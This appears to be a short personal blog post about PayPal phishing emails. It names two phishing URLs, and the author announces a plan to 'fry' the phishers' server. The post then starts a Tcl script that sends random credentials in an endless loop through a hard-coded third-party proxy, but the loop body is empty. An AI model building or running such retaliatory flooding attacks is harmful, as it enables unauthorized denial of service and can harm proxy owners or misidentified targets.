# Killing fake Paypal emails (identity thefts)

I was getting spammed by fake Paypal emails that looks like this. It looks original (these culprits hotlink the images to real paypal site). However, when you view the source, you will notice that the link that says “Click here to verify your account” leads to their fake site that collects user name and password. The url keeps changing with many emails. It looks like “http://spport-cgi.com/login.html” or “http://veri-sign-cgi.com/cgi-bin/login.html”

I decided to go on the offensive and fry their database/server. The login page is quite simple. It has a single form asking for user name and password. Armed with Tcl, I wrote the following simple script that continuously sends random user name/password to the server.

package require http
proc getRand {} { return [expr int(rand()*100000)] }

::http::config -proxyhost "200.79.80.169" -proxyport 80
while { true } {
}